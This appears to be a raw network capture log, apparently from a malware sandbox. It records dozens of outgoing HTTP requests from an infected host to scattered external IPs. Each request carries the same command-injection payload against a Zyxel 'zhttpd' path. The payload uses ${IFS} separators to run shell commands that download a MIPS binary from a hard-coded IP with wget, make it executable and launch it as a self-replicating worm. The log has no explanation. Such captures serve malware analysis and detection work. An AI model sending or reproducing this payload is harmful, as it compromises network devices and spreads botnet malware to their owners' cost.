                                      Jan 14, 2024 15:50:32.982526064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1013192.168.2.1460452189.158.217.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982557058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1014192.168.2.1448004154.24.102.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982578993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1015192.168.2.1445456210.230.169.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982625008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1016192.168.2.144286060.183.73.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982681990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1017192.168.2.1432828122.56.172.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982712030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1018192.168.2.1446042103.168.132.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982743025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1019192.168.2.1444210141.211.38.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982778072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1020192.168.2.1440490198.150.166.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982821941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1021192.168.2.144698687.15.109.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982857943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1022192.168.2.144949283.133.165.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982897043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1023192.168.2.14562181.212.253.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982949018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1024192.168.2.144558065.251.13.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.982964039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1025192.168.2.145447235.174.101.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983022928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1026192.168.2.143358090.128.195.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983045101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1027192.168.2.144411683.11.131.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983067989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1028192.168.2.144486674.140.182.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983130932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1029192.168.2.144814647.252.112.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983170033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1030192.168.2.1435270107.115.175.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983195066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1031192.168.2.1445968200.154.117.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983246088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1032192.168.2.146013097.9.31.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983263969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1033192.168.2.1451758100.145.70.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983323097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1034192.168.2.1444170164.56.107.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983369112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1035192.168.2.1455420164.128.176.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983397007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1036192.168.2.1443998221.132.152.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983437061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1037192.168.2.1452888190.200.140.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983468056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1038192.168.2.1435162102.142.238.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983525991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1039192.168.2.14383302.21.135.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983572960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1040192.168.2.1446538138.220.170.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983603001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1041192.168.2.1458578176.140.85.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983638048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1042192.168.2.1436938182.167.235.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983663082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1043192.168.2.1446314133.121.31.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983711004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1044192.168.2.1458118140.186.31.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983747005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1045192.168.2.1436830136.66.73.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983793020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1046192.168.2.144936264.143.220.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983838081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1047192.168.2.144148669.107.234.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983901978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1048192.168.2.145786286.6.184.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983931065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1049192.168.2.1440916205.122.156.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.983983040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1050192.168.2.145525653.164.178.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.984039068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1051192.168.2.1452090157.70.88.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.984074116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1052192.168.2.1441650155.107.90.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.984148979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1053192.168.2.144760080.201.143.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.987953901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1054192.168.2.1457984135.77.251.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.987982988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1055192.168.2.1435406128.179.230.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.988038063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1056192.168.2.1435250149.144.224.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.988075018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1057192.168.2.1433692219.202.150.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.988120079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1058192.168.2.1459492208.128.184.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.988151073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1059192.168.2.1438816180.238.20.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.988188028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1060192.168.2.145708846.38.237.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.988221884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1061192.168.2.145286660.40.197.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.988255024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1062192.168.2.1450208159.220.217.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997448921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1063192.168.2.143592277.247.193.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997498989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1064192.168.2.143605638.215.201.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997534037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1065192.168.2.1458416111.81.118.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997590065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1066192.168.2.1432932177.77.236.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997626066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1067192.168.2.143381445.104.22.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997673035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1068192.168.2.1457042143.181.255.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997740984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1069192.168.2.145228637.80.12.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997771025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1070192.168.2.144613036.154.167.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997802019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1071192.168.2.1437704213.144.88.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997829914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1072192.168.2.144897488.204.53.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997909069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1073192.168.2.1433404150.211.134.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.997966051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1074192.168.2.143738093.109.125.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998030901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1075192.168.2.145592653.180.16.2443
                                      TimestampBytes transferredDirectionData
